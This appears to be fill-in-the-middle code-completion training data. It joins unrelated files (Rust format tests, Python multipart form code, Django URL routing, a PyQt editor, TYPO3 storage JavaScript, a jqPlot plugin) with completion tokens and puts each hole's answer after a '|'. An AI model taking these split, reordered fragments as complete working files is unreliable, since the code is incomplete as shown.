dotProp.get(self.scope, data.path).job.call(data); |
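// Illustrative client-side counterpart (socket.io client; the path is
// hypothetical and must match a job registered in `scope`):
//   socket.emit('call', { path: 'jobs.rebuild', data: {} });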
<|file_name|>ifmt.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// no-pretty-expanded unnecessary unsafe block generated
// ignore-lexer-test FIXME #15679
#![feature(macro_rules)]
#![deny(warnings)]
#![allow(unused_must_use)]
use std::fmt;
use std::io;
struct A;
struct B;
struct C;
impl fmt::LowerHex for A {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
f.write("aloha".as_bytes())
}
}
impl fmt::UpperHex for B {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
f.write("adios".as_bytes())
}
}
impl fmt::Show for C {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
f.pad_integral(true, "☃", "123".as_bytes())
}
}
macro_rules! t(($a:expr, $b:expr) => { assert_eq!($a.as_slice(), $b) })
pub fn main() {
// Various edge cases without formats
t!(format!(""), "");
t!(format!("hello"), "hello");
t!(format!("hello {{"), "hello {");
// default formatters should work
t!(format!("{}", 1.0f32), "1");
t!(format!("{}", 1.0f64), "1");
t!(format!("{}", "a"), "a");
t!(format!("{}", "a".to_string()), "a");
t!(format!("{}", false), "false");
t!(format!("{}", 'a'), "a");
// At least exercise all the formats
t!(format!("{}", true), "true");
t!(format!("{}", '☃'), "☃");
t!(format!("{}", 10i), "10");
t!(format!("{}", 10i), "10");
t!(format!("{}", 10u), "10");
t!(format!("{:o}", 10u), "12");
t!(format!("{:x}", 10u), "a");
t!(format!("{:X}", 10u), "A");
t!(format!("{}", "foo"), "foo");
t!(format!("{}", "foo".to_string()), "foo");
t!(format!("{:p}", 0x1234 as *const int), "0x1234");
t!(format!("{:p}", 0x1234 as *mut int), "0x1234");
t!(format!("{:x}", A), "aloha");
t!(format!("{:X}", B), "adios");
t!(format!("foo {} ☃☃☃☃☃☃", "bar"), "foo bar ☃☃☃☃☃☃");
t!(format!("{1} {0}", 0i, 1i), "1 0");
t!(format!("{foo} {bar}", foo=0i, bar=1i), "0 1");
t!(format!("{foo} {1} {bar} {0}", 0i, 1i, foo=2i, bar=3i), "2 1 3 0");
t!(format!("{} {0}", "a"), "a a");
t!(format!("{foo_bar}", foo_bar=1i), "1");
t!(format!("{}", 5i + 5i), "10");
t!(format!("{:#4}", C), "☃123");
let a: &fmt::Show = &1i;
t!(format!("{}", a), "1");
// Formatting strings and their arguments
t!(format!("{}", "a"), "a");
t!(format!("{:4}", "a"), "a ");
t!(format!("{:4}", "☃"), "☃ ");
t!(format!("{:>4}", "a"), " a");
t!(format!("{:<4}", "a"), "a ");
t!(format!("{:^5}", "a"), " a ");
t!(format!("{:^5}", "aa"), " aa ");
t!(format!("{:^4}", "a"), " a ");
t!(format!("{:^4}", "aa"), " aa ");
t!(format!("{:.4}", "a"), "a");
t!(format!("{:4.4}", "a"), "a ");
t!(format!("{:4.4}", "aaaaaaaaaaaaaaaaaa"), "aaaa");
t!(format!("{:<4.4}", "aaaaaaaaaaaaaaaaaa"), "aaaa");
t!(format!("{:>4.4}", "aaaaaaaaaaaaaaaaaa"), "aaaa");
t!(format!("{:^4.4}", "aaaaaaaaaaaaaaaaaa"), "aaaa");
t!(format!("{:>10.4}", "aaaaaaaaaaaaaaaaaa"), "aaaa");
t!(format!("{:2.4}", "aaaaa"), "aaaa");
t!(format!("{:2.4}", "aaaa"), "aaaa");
t!(format!("{:2.4}", "aaa"), "aaa");
t!(format!("{:2.4}", "aa"), "aa");
t!(format!("{:2.4}", "a"), "a ");
t!(format!("{:0>2}", "a"), "0a");
t!(format!("{:.*}", 4, "aaaaaaaaaaaaaaaaaa"), "aaaa");
t!(format!("{:.1$}", "aaaaaaaaaaaaaaaaaa", 4), "aaaa");
t!(format!("{:.a$}", "aaaaaaaaaaaaaaaaaa", a=4), "aaaa");
t!(format!("{:1$}", "a", 4), "a ");
t!(format!("{1:0$}", 4, "a"), "a ");
t!(format!("{:a$}", "a", a=4), "a ");
t!(format!("{:-#}", "a"), "a");
t!(format!("{:+#}", "a"), "a");
// Some float stuff
t!(format!("{:}", 1.0f32), "1");
t!(format!("{:}", 1.0f64), "1");
t!(format!("{:.3}", 1.0f64), "1.000");
t!(format!("{:10.3}", 1.0f64), " 1.000");
t!(format!("{:+10.3}", 1.0f64), " +1.000");
t!(format!("{:+10.3}", -1.0f64), " -1.000");
t!(format!("{:e}", 1.2345e6f32), "1.2345e6");
t!(format!("{:e}", 1.2345e6f64), "1.2345e6");
t!(format!("{:E}", 1.2345e6f64), "1.2345E6");
t!(format!("{:.3e}", 1.2345e6f64), "1.234e6");
t!(format!("{:10.3e}", 1.2345e6f64), " 1.234e6");
t!(format!("{:+10.3e}", 1.2345e6f64), " +1.234e6");
t!(format!("{:+10.3e}", -1.2345e6f64), " -1.234e6");
// Escaping
t!(format!("{{"), "{");
t!(format!("}}"), "}");
test_write();
test_print();
test_order();
// make sure that format! doesn't move out of local variables
let a = box 3i;
format!("{}", a);
format!("{}", a);
// make sure that format! doesn't cause spurious unused-unsafe warnings when
// it's inside of an outer unsafe block
unsafe {
let a: int = ::std::mem::transmute(3u);
format!("{}", a);
}
test_format_args();
// test that trailing commas are acceptable
format!("{}", "test",);
format!("{foo}", foo="test",);
}
// Basic test to make sure that we can invoke the `write!` macro with an
// io::Writer instance.
fn test_write() {
let mut buf = Vec::new();
write!(&mut buf as &mut io::Writer, "{}", 3i);
{
let w = &mut buf as &mut io::Writer;
write!(w, "{foo}", foo=4i);
write!(w, "{}", "hello");
writeln!(w, "{}", "line");
writeln!(w, "{foo}", foo="bar");
}
let s = String::from_utf8(buf).unwrap();
t!(s, "34helloline\nbar\n");
}
// Just make sure that the macros are defined, there's not really a lot that we
// can do with them just yet (to test the output)
fn test_print() {
print!("hi");
print!("{}", vec!(0u8));
println!("hello");
println!("this is a {}", "test");
println!("{foo}", foo="bar");
}
<|fim▁hole|>fn test_format_args() {
let mut buf = Vec::new();
{
let w = &mut buf as &mut io::Writer;
format_args!(|args| { write!(w, "{}", args); }, "{}", 1i);
format_args!(|args| { write!(w, "{}", args); }, "test");
format_args!(|args| { write!(w, "{}", args); }, "{test}", test=3i);
}
let s = String::from_utf8(buf).unwrap();
t!(s, "1test3");
let s = format_args!(fmt::format, "hello {}", "world");
t!(s, "hello world");
let s = format_args!(|args| {
format!("{}: {}", "args were", args)
}, "hello {}", "world");
t!(s, "args were: hello world");
}
fn test_order() {
// Make sure format!() arguments are always evaluated in a left-to-right
// ordering
fn foo() -> int {
static mut FOO: int = 0;
unsafe {
FOO += 1;
FOO
}
}
assert_eq!(format!("{} {} {a} {b} {} {c}",
foo(), foo(), foo(), a=foo(), b=foo(), c=foo()),
"1 2 4 5 3 6".to_string());
}<|fim▁end|> | // Just make sure that the macros are defined, there's not really a lot that we
// can do with them just yet (to test the output) |
<|file_name|>multipart.py<|end_file_name|><|fim▁begin|>'''
Classes for using multipart form data from Python, which does not (at the
time of writing) support this directly.
To use this, make an instance of Multipart and add parts to it via the factory
methods field and file. When you are done, get the content via the get method.
@author: Stacy Prowell (http://stacyprowell.com)
'''
import mimetypes
class Part(object):
'''
Class holding a single part of the form. You should never need to use
this class directly; instead, use the factory methods in Multipart:
field and file.
'''
# The boundary to use. This is shamelessly taken from the standard.
BOUNDARY = '----------AaB03x'
CRLF = '\r\n'
# Common headers.
CONTENT_TYPE = 'Content-Type'
CONTENT_DISPOSITION = 'Content-Disposition'
# The default content type for parts.
DEFAULT_CONTENT_TYPE = 'application/octet-stream'
def __init__(self, name, filename, body, headers):
'''
Make a new part. The part will have the given headers added initially.
@param name: The part name.
@type name: str
@param filename: If this is a file, the name of the file. Otherwise
None.
@type filename: str
@param body: The body of the part.
@type body: str
@param headers: Additional headers, or overrides, for this part.
You can override Content-Type here.
@type headers: dict
'''
self._headers = headers.copy()
self._name = name
self._filename = filename
self._body = body
# We respect any content type passed in, but otherwise set it here.
# We set the content disposition now, overwriting any prior value.
if self._filename is None:
self._headers[Part.CONTENT_DISPOSITION] = \
('form-data; name="%s"' % self._name)
self._headers.setdefault(Part.CONTENT_TYPE,
Part.DEFAULT_CONTENT_TYPE)
else:
self._headers[Part.CONTENT_DISPOSITION] = \
('form-data; name="%s"; filename="%s"' %
(self._name, self._filename))
self._headers.setdefault(Part.CONTENT_TYPE,
mimetypes.guess_type(filename)[0]
or Part.DEFAULT_CONTENT_TYPE)
return
def get(self):
'''
Convert the part into a list of lines for output. This includes
the boundary lines, part header lines, and the part itself. A
blank line is included between the header and the body.
@return: Lines of this part.
@rtype: list
'''
lines = []
lines.append('--' + Part.BOUNDARY)
for (key, val) in self._headers.items():
lines.append(str('%s: %s' % (key, val)))
lines.append('')
lines.append(self._body)
return lines
class Multipart(object):
'''
Encapsulate multipart form data. To use this, make an instance and then
add parts to it via the two methods (field and file). When done, you can
get the result via the get method.
See http://www.w3.org/TR/html401/interact/forms.html#h-17.13.4.2 for
details on multipart/form-data.
Watch http://bugs.python.org/issue3244 to see if this is fixed in the
Python libraries.
@return: content type, body
@rtype: tuple
'''
def __init__(self):
self.parts = []
return
def field(self, name, value, headers={}):
'''
Create and append a field part. This kind of part has a field name
and value.
@param name: The field name.
@type name: str
@param value: The field value.
@type value: str
@param headers: Headers to set in addition to disposition.
@type headers: dict
'''
self.parts.append(Part(name, None, value, headers))
return
def file(self, name, filename, value, headers={}):
'''<|fim▁hole|>
@param name: The field name.
@type name: str
@param value: The field value.
@type value: str
@param headers: Headers to set in addition to disposition.
@type headers: dict
'''
self.parts.append(Part(name, filename, value, headers))
return
def get(self):
'''
Get the multipart form data. This returns the content type, which
specifies the boundary marker, and also returns the body containing
all parts and bondary markers.
@return: content type, body
@rtype: tuple
'''
all = []
for part in self.parts:
all += part.get()
all.append('--' + Part.BOUNDARY + '--')
all.append('')
# We have to return the content type, since it specifies the boundary.
content_type = 'multipart/form-data; boundary=%s' % Part.BOUNDARY
return content_type, Part.CRLF.join(all)<|fim▁end|> | Create and append a file part. This kind of part has a field name,
a filename, and a value.
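# Illustrative usage sketch (field names and file content are hypothetical):
#   form = Multipart()
#   form.field('author', 'Stacy')
#   form.file('upload', 'notes.txt', 'file contents here')
#   content_type, body = form.get()
# `content_type` carries the boundary marker; `body` is ready to POST.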
<|file_name|>urls.py<|end_file_name|><|fim▁begin|># Copyright (C) 2012 Aaron Krebs [email protected]
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
from django.views.generic.simple import direct_to_template
from django.contrib.auth import views as auth_views
from django.conf.urls import patterns, url
from django.core.urlresolvers import reverse_lazy
from registration.views import register
urlpatterns = patterns('',
# urls for simple one-step registration
url(r'^register/$',
register,
{'backend': 'registration.backends.simple.SimpleBackend',
'template_name': 'registration/registration_form.hamlpy',
},
name='registration_register'
),
url(r'^register/closed/$',
direct_to_template,
{'template': 'registration/registration_closed.hamlpy'},<|fim▁hole|> url(r'^login/$',
auth_views.login,
{'template_name': 'registration/login.hamlpy'},
name='auth_login'
),
url(r'^logout/$',
auth_views.logout,
{'template_name': 'registration/logout.hamlpy'},
name='auth_logout'
),
url(r'^password/change/$',
auth_views.password_change,
{'template_name': 'registration/password_change_form.hamlpy',
# ugh, this is tied to the namespace; needs to be namespace-agnostic
# since the namspace is determined by the importing app
# TODO: see Issue #1
'post_change_redirect': reverse_lazy('registration:auth_password_change_done')
},
name='auth_password_change'
),
url(r'^password/change/done/$',
auth_views.password_change_done,
{'template_name': 'registration/password_change_done.hamlpy'},
name='auth_password_change_done'
),
url(r'^password/reset/$',
auth_views.password_reset,
{'template_name': 'registration/password_reset_form.hamlpy',
# same issue as above
'post_reset_redirect': reverse_lazy('registration:auth_password_reset_done'),
'email_template_name': 'registration/password_reset_email.hamlpy',
'subject_template_name': 'registration/password_reset_subject.hamlpy',
},
name='auth_password_reset'
),
url(r'^password/reset/confirm/(?P<uidb36>[0-9A-Za-z]+)-(?P<token>.+)/$',
auth_views.password_reset_confirm,
{'template_name': 'registration/password_reset_confirm.hamlpy',
# same issue as above
'post_reset_redirect': reverse_lazy('registration:auth_password_reset_complete'),
},
name='auth_password_reset_confirm'
),
url(r'^password/reset/complete/$',
auth_views.password_reset_complete,
{'template_name': 'registration/password_reset_complete.hamlpy'},
name='auth_password_reset_complete'
),
url(r'^password/reset/done/$',
auth_views.password_reset_done,
{'template_name': 'registration/password_reset_done.hamlpy'},
name='auth_password_reset_done'
),
)<|fim▁end|> | name='registration_disallowed'
), |
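# Illustrative sketch of how a project might mount these URLs (prefix is
# hypothetical, and `include` is assumed to be imported from
# django.conf.urls). The reverse_lazy('registration:...') calls above
# depend on this namespace:
#   url(r'^accounts/', include('registration.urls', namespace='registration')),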
<|file_name|>editorbase.py<|end_file_name|><|fim▁begin|># Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington
# See opus_core/LICENSE
# PyQt4 includes for python bindings to QT
from PyQt4.QtCore import Qt, QString
from PyQt4.QtGui import QFont, QFontMetrics, QColor, QIcon, QLabel, QWidget, QVBoxLayout
from PyQt4.Qsci import QsciScintilla, QsciLexerPython
<|fim▁hole|>class EditorBase(QsciScintilla):
def __init__(self, mainwindow):
QsciScintilla.__init__(self, mainwindow)
self.mainwindow = mainwindow
## define the font to use
font = QFont()
font.setFamily("Consolas")
font.setFixedPitch(True)
font.setPointSize(10)
# the font metrics here will help
# building the margin width later
fm = QFontMetrics(font)
## set the default font of the editor
## and take the same font for line numbers
self.setFont(font)
self.setMarginsFont(font)
## Line numbers
# conventionnaly, margin 0 is for line numbers
self.setMarginWidth(0, fm.width( "00000" ) + 5)
self.setMarginLineNumbers(0, True)
## Edge Mode shows a red vetical bar at 80 chars
self.setEdgeMode(QsciScintilla.EdgeLine)
self.setEdgeColumn(80)
self.setEdgeColor(QColor("#CCCCCC"))
## Folding visual : we will use boxes
self.setFolding(QsciScintilla.BoxedTreeFoldStyle)
## Braces matching
self.setBraceMatching(QsciScintilla.SloppyBraceMatch)
## Editing line color
#self.setCaretLineVisible(True)
#self.setCaretLineBackgroundColor(QColor("#CDA869"))
## Margins colors
# line numbers margin
self.setMarginsBackgroundColor(QColor("#333333"))
self.setMarginsForegroundColor(QColor("#CCCCCC"))
# folding margin colors (foreground,background)
#self.setFoldMarginColors(QColor("#99CC66"),QColor("#333300"))
self.setFoldMarginColors(QColor("#CCCCCC"),QColor("#CCCCCC"))
## Choose a lexer
lexer = QsciLexerPython()
lexer.setDefaultFont(font)
self.setLexer(lexer)
class EditorTab(object):
def __init__(self, mainwindow, filePath):
self.mainwindow = mainwindow
self.tabIcon = QIcon(":/Images/Images/cog.png")
self.tabLabel = "Editor Dyn Tab"
self.tab = QWidget(self.mainwindow)
self.widgetLayout = QVBoxLayout(self.tab)
self.widgetLayout.setAlignment(Qt.AlignTop)
self.editorStatusLabel = QLabel(self.tab)
self.editorStatusLabel.setAlignment(Qt.AlignCenter)
self.editorStatusLabel.setObjectName("editorStatusLabel")
self.editorStatusLabel.setText(QString("No files currently loaded..."))
self.widgetLayout.addWidget(self.editorStatusLabel)
self.editorStuff = EditorBase(self.mainwindow)
self.widgetLayout.addWidget(self.editorStuff)
try:
f = open(filePath,'r')
except:
return
for l in f.readlines():
self.editorStuff.append(l)
f.close()
self.editorStatusLabel.setText(QString(filePath))
self.mainwindow.tabWidget.insertTab(0,self.tab,self.tabIcon,self.tabLabel)
self.mainwindow.tabWidget.setCurrentIndex(0)<|fim▁end|> | # Main |
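# Illustrative usage sketch (`mainwindow` is assumed to expose the tabWidget
# attribute used above; the path is hypothetical):
#   tab = EditorTab(mainwindow, '/path/to/script.py')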
<|file_name|>dump_waffle_flags.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
from django.core.management import call_command
from django.core.management.base import BaseCommand
class Command(BaseCommand):
def handle(self, *args, **options):
call_command(
'dumpdata',<|fim▁hole|> use_natural_primary_keys=True,
output='base/fixtures/waffle_flags.json'
)<|fim▁end|> | "waffle.flag",
indent=4,
use_natural_foreign_keys=True, |
<|file_name|>traits.rs<|end_file_name|><|fim▁begin|>// Copyright 2015, 2016 Parity Technologies (UK) Ltd.
// This file is part of Parity.
// Parity is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// Parity is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with Parity. If not, see <http://www.gnu.org/licenses/>.
//! Disk-backed `HashDB` implementation.
use common::*;
use hashdb::*;
use kvdb::{Database, DBTransaction};
/// A `HashDB` which can manage a short-term journal potentially containing many forks of mutually
/// exclusive actions.
pub trait JournalDB: HashDB {
/// Return a copy of ourself, in a box.
fn boxed_clone(&self) -> Box<JournalDB>;
/// Returns heap memory size used<|fim▁hole|> /// This function has a considerable speed requirement --
/// it must be fast enough to call several times per block imported.
fn journal_size(&self) -> usize { 0 }
/// Check if this database has any commits
fn is_empty(&self) -> bool;
/// Get the earliest era in the DB. None if there isn't yet any data in there.
fn earliest_era(&self) -> Option<u64> { None }
/// Get the latest era in the DB. None if there isn't yet any data in there.
fn latest_era(&self) -> Option<u64>;
/// Journal recent database operations as being associated with a given era and id.
// TODO: give the overlay to this function so journaldbs don't manage the overlays themselves.
fn journal_under(&mut self, batch: &mut DBTransaction, now: u64, id: &H256) -> Result<u32, UtilError>;
/// Mark a given block as canonical, indicating that competing blocks' states may be pruned out.
fn mark_canonical(&mut self, batch: &mut DBTransaction, era: u64, id: &H256) -> Result<u32, UtilError>;
/// Commit all queued insert and delete operations without affecting any journalling -- this requires that all insertions
/// and deletions are indeed canonical and will likely lead to an invalid database if that assumption is violated.
///
/// Any keys or values inserted or deleted must be completely independent of those affected
/// by any previous `commit` operations. Essentially, this means that `inject` can be used
/// either to restore a state to a fresh database, or to insert data which may only be journalled
/// from this point onwards.
fn inject(&mut self, batch: &mut DBTransaction) -> Result<u32, UtilError>;
/// State data query
fn state(&self, _id: &H256) -> Option<Bytes>;
/// Whether this database is pruned.
fn is_pruned(&self) -> bool { true }
/// Get backing database.
fn backing(&self) -> &Arc<Database>;
/// Clear internal structures. This should be called after changes have been written
/// to the backing storage.
fn flush(&self) {}
/// Consolidate all the insertions and deletions in the given memory overlay.
fn consolidate(&mut self, overlay: ::memorydb::MemoryDB);
/// Commit all changes in a single batch
#[cfg(test)]
fn commit_batch(&mut self, now: u64, id: &H256, end: Option<(u64, H256)>) -> Result<u32, UtilError> {
let mut batch = self.backing().transaction();
let mut ops = self.journal_under(&mut batch, now, id)?;
if let Some((end_era, canon_id)) = end {
ops += self.mark_canonical(&mut batch, end_era, &canon_id)?;
}
let result = self.backing().write(batch).map(|_| ops).map_err(Into::into);
self.flush();
result
}
/// Inject all changes in a single batch.
#[cfg(test)]
fn inject_batch(&mut self) -> Result<u32, UtilError> {
let mut batch = self.backing().transaction();
let res = self.inject(&mut batch)?;
self.backing().write(batch).map(|_| res).map_err(Into::into)
}
}<|fim▁end|> | fn mem_used(&self) -> usize;
/// Returns the size of journalled state in memory. |
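// Illustrative call sequence for the journalling API above (identifiers are
// hypothetical; `db` is any JournalDB implementation). This mirrors what
// `commit_batch` does internally:
//
//   let mut batch = db.backing().transaction();
//   db.journal_under(&mut batch, era, &block_id)?;          // journal the new block
//   db.mark_canonical(&mut batch, ancient_era, &canon_id)?; // prune competitors
//   db.backing().write(batch)?;
//   db.flush();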
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>from setuptools import setup
with open("README.rst") as readme_file:
long_description = readme_file.read()
setup(name="Presser",
version="0.1.8",
packages=["presser",],
license="GNU GPL v3.0",
description="Extracts data from vine, in lieu of an API",
author="Gemma Hentsch",
author_email="[email protected]",
install_requires=[
"beautifulsoup4>=4.3.2",
"requests>=2.4.0",
"PyExecJS>=1.0.4",
],
tests_require=[
"beautifulsoup4",
"requests",
"mock",
"coverage",
"nose",
"PyExecJS",
"responses"
],
long_description=long_description,
test_suite="nose.collector",
url="https://github.com/ladyrassilon/presser",
keywords = ['scraping','vine'],<|fim▁hole|> classifiers=[
"Development Status :: 4 - Beta",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 2.7",
# "Programming Language :: Python :: Implementation",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Programming Language :: Python",
"Intended Audience :: Developers",
]
)<|fim▁end|> | download_url="https://github.com/ladyrassilon/presser/archive/", |
<|file_name|>Storage.js<|end_file_name|><|fim▁begin|>/*
* This file is part of the TYPO3 CMS project.
*
* It is free software; you can redistribute it and/or modify it under
* the terms of the GNU General Public License, either version 2
* of the License, or any later version.
*
* For the full copyright and license information, please read the
* LICENSE.txt file that was distributed with this source code.
*
* The TYPO3 project - inspiring people to share!
*/
/**
* Adds a public API for the browsers' localStorage called
* TYPO3.Storage.Client and the Backend Users "uc",
* available via TYPO3.Storage.Persistent
*/
define('TYPO3/CMS/Backend/Storage', ['jquery'], function ($) {
var Storage = {
Client: {},
Persistent: {
_data: false
}
};
/**
* simple localStorage wrapper, common functions get/set/clear
*/
Storage.Client.get = function(key) {
return localStorage.getItem('t3-' + key);
};
Storage.Client.set = function(key, value) {
return localStorage.setItem('t3-' + key, value);
};
Storage.Client.clear = function() {
localStorage.clear();
};
/**
* checks if a key was set before, useful to not do all the undefined checks all the time
*/
Storage.Client.isset = function(key) {
var value = this.get(key);
return (typeof value !== 'undefined' && value !== null && value != 'undefined');
};
/**
* persistent storage, stores everything on the server
* via AJAX, does a greedy load on read
* common functions get/set/clear
*/
Storage.Persistent.get = function(key) {
if (this._data === false) {
var value;
this._loadFromServer().done(function() {
value = Storage.Persistent._getRecursiveDataByDeepKey(Storage.Persistent._data, key.split('.'));
});
return value;
} else {
return this._getRecursiveDataByDeepKey(this._data, key.split('.'));
}
};
Storage.Persistent.set = function(key, value) {
if (this._data !== false) {
this._data = this._setRecursiveDataByDeepKey(this._data, key.split('.'), value);
}
return this._storeOnServer(key, value);
};
Storage.Persistent.addToList = function(key, value) {
return $.ajax(TYPO3.settings.ajaxUrls['usersettings_process'], {data: {'action': 'addToList', key: key, value: value}}).done(function(data) {
Storage.Persistent._data = data;
});
};
Storage.Persistent.removeFromList = function(key, value) {
return $.ajax(TYPO3.settings.ajaxUrls['usersettings_process'], {data: {'action': 'removeFromList', key: key, value: value}}).done(function(data) {
Storage.Persistent._data = data;
});
};
Storage.Persistent.unset = function(key) {
return $.ajax(TYPO3.settings.ajaxUrls['usersettings_process'], {data: {'action': 'unset', key: key}}).done(function(data) {
Storage.Persistent._data = data;
});
};
Storage.Persistent.clear = function() {
$.ajax(TYPO3.settings.ajaxUrls['usersettings_process'], {data: {'action': 'clear'}});
this._data = false;
};
/**
 * checks if a key was set before; useful to avoid repeating undefined checks everywhere
*/
Storage.Persistent.isset = function(key) {
var value = this.get(key);
return (typeof value !== 'undefined' && value !== null && value !== 'undefined');
};
/**
* loads the data from outside, only used for the initial call from BackendController
* @param data
*/
Storage.Persistent.load = function(data) {
this._data = data;
};
/**
* loads all data from the server
* @returns jQuery Deferred
* @private
*/
Storage.Persistent._loadFromServer = function() {
return $.ajax(TYPO3.settings.ajaxUrls['usersettings_process'], {data: {'action': 'getAll'}, async: false}).done(function(data) {
Storage.Persistent._data = data;
});
};
/**
* stores data on the server, and gets the updated data on return
* to always be up-to-date inside the browser
* @returns jQuery Deferred
* @private
*/
Storage.Persistent._storeOnServer = function(key, value) {
return $.ajax(TYPO3.settings.ajaxUrls['usersettings_process'], {data: {'action': 'set', key: key, value: value}}).done(function(data) {
Storage.Persistent._data = data;
});
};
/**
* helper function used to set a value which could have been a flat object key data["my.foo.bar"] to
* data[my][foo][bar]
* is called recursively by itself
*
 * @param data the data to be used as base
* @param keyParts the keyParts for the subtree
* @param value the value to be set<|fim▁hole|> * @private
*/
Storage.Persistent._setRecursiveDataByDeepKey = function(data, keyParts, value) {
if (keyParts.length === 1) {
data = data || {};
data[keyParts[0]] = value;
} else {
var firstKey = keyParts.shift();
data[firstKey] = this._setRecursiveDataByDeepKey(data[firstKey] || {}, keyParts, value);
}
return data;
};
/**
 * helper function used to get a value addressed by a flat object key like data["my.foo.bar"] from
 * the nested structure data[my][foo][bar]
 * is called recursively by itself
 *
 * @param data the data to be used as base
* @param keyParts the keyParts for the subtree
* @returns {*}
* @private
*/
Storage.Persistent._getRecursiveDataByDeepKey = function(data, keyParts) {
if (keyParts.length === 1) {
return (data || {})[keyParts[0]];
} else {
var firstKey = keyParts.shift();
return this._getRecursiveDataByDeepKey(data[firstKey] || {}, keyParts);
}
};
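/**
 * Worked example for the two deep-key helpers above (illustration only, not
 * part of the original API surface):
 *
 *   Storage.Persistent._setRecursiveDataByDeepKey({}, 'my.foo.bar'.split('.'), 1);
 *   // => { my: { foo: { bar: 1 } } }
 *   Storage.Persistent._getRecursiveDataByDeepKey({my: {foo: {bar: 1}}}, 'my.foo.bar'.split('.'));
 *   // => 1
 */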
/**
* return the Storage object, and attach it to the global TYPO3 object on the global frame
*/
return function() {
top.TYPO3.Storage = Storage;
return Storage;
}();
});<|fim▁end|> | * @returns the data object |
<|file_name|>jqplot.cursor.js<|end_file_name|><|fim▁begin|>/**
* jqPlot
* Pure JavaScript plotting plugin using jQuery
*
* Version: 1.0.4
* Revision: 1120
*
* Copyright (c) 2009-2012 Chris Leonello
* jqPlot is currently available for use in all personal or commercial projects
* under both the MIT (http://www.opensource.org/licenses/mit-license.php) and GPL
* version 2.0 (http://www.gnu.org/licenses/gpl-2.0.html) licenses. This means that you can
* choose the license that best suits your project and use it accordingly.
*
* Although not required, the author would appreciate an email letting him
* know of any substantial use of jqPlot. You can reach the author at:
* chris at jqplot dot com or see http://www.jqplot.com/info.php .
*
* If you are feeling kind and generous, consider supporting the project by
* making a donation at: http://www.jqplot.com/donate.php .
*
* sprintf functions contained in jqplot.sprintf.js by Ash Searle:
*
* version 2007.04.27
* author Ash Searle
* http://hexmen.com/blog/2007/03/printf-sprintf/
* http://hexmen.com/js/sprintf.js
* The author (Ash Searle) has placed this code in the public domain:
* "This code is unrestricted: you are free to use it however you like."
*
*/
(function($) {
/**
* Class: $.jqplot.Cursor
* Plugin class representing the cursor as displayed on the plot.
*/
$.jqplot.Cursor = function(options) {
// Group: Properties
//
// prop: style
// CSS spec for cursor style
this.style = 'crosshair';
this.previousCursor = 'auto';
// prop: show
// whether to show the cursor or not.
this.show = $.jqplot.config.enablePlugins;
// prop: showTooltip
// show a cursor position tooltip. Location of the tooltip
// will be controlled by followMouse and tooltipLocation.
this.showTooltip = true;
// prop: followMouse
// Tooltip follows the mouse, it is not at a fixed location.
// Tooltip will show on the grid at the location given by
// tooltipLocation, offset from the grid edge by tooltipOffset.
this.followMouse = false;
// prop: tooltipLocation
// Where to position tooltip. If followMouse is true, this is
// relative to the cursor, otherwise, it is relative to the grid.
// One of 'n', 'ne', 'e', 'se', 's', 'sw', 'w', 'nw'
this.tooltipLocation = 'se';
// prop: tooltipOffset
// Pixel offset of tooltip from the grid boundaries or cursor center.
this.tooltipOffset = 6;
// prop: showTooltipGridPosition
// show the grid pixel coordinates of the mouse.
this.showTooltipGridPosition = false;
// prop: showTooltipUnitPosition
// show the unit (data) coordinates of the mouse.
this.showTooltipUnitPosition = true;
// prop: showTooltipDataPosition
// Used with showVerticalLine to show intersecting data points in the tooltip.
this.showTooltipDataPosition = false;
// prop: tooltipFormatString
// sprintf format string for the tooltip.
// Uses Ash Searle's javascript sprintf implementation
// found here: http://hexmen.com/blog/2007/03/printf-sprintf/
// See http://perldoc.perl.org/functions/sprintf.html for reference
// Note, if showTooltipDataPosition is true, the default tooltipFormatString
// will be set to the cursorLegendFormatString, not the default given here.
this.tooltipFormatString = '%.4P, %.4P';
// prop: useAxesFormatters
// Use the x and y axes formatters to format the text in the tooltip.
this.useAxesFormatters = true;
// prop: tooltipAxisGroups
// Show position for the specified axes.
// This is an array like [['xaxis', 'yaxis'], ['xaxis', 'y2axis']]
// Default is to compute automatically for all visible axes.
this.tooltipAxisGroups = [];
// prop: zoom
// Enable plot zooming.
this.zoom = false;
// zoomProxy and zoomTarget properties are not directly set by the user.
// They will be set through a call to the zoomProxy method.
this.zoomProxy = false;
this.zoomTarget = false;
// prop: looseZoom
// Will expand zoom range to provide more rounded tick values.
// Works only with linear, log and date axes.
this.looseZoom = true;
// prop: clickReset
// Will reset plot zoom if single click on plot without drag.
this.clickReset = false;
// prop: dblClickReset
// Will reset plot zoom if double click on plot without drag.
this.dblClickReset = true;
// prop: showVerticalLine
// draw a vertical line across the plot which follows the cursor.
// When the line is near a data point, a special legend and/or tooltip can
// be updated with the data values.
this.showVerticalLine = false;
// prop: showHorizontalLine
// draw a horizontal line across the plot which follows the cursor.
this.showHorizontalLine = false;
// prop: constrainZoomTo
